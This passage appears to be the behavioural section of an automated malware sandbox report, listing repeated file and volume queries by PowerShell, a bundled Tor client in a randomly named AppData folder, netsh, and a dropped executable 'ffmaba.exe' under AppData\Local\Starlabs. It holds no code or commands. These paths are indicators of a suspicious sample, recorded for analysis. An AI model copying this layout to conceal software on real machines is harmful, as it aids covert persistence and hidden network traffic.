                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeQueries volume information: C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt VolumeInformation
                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
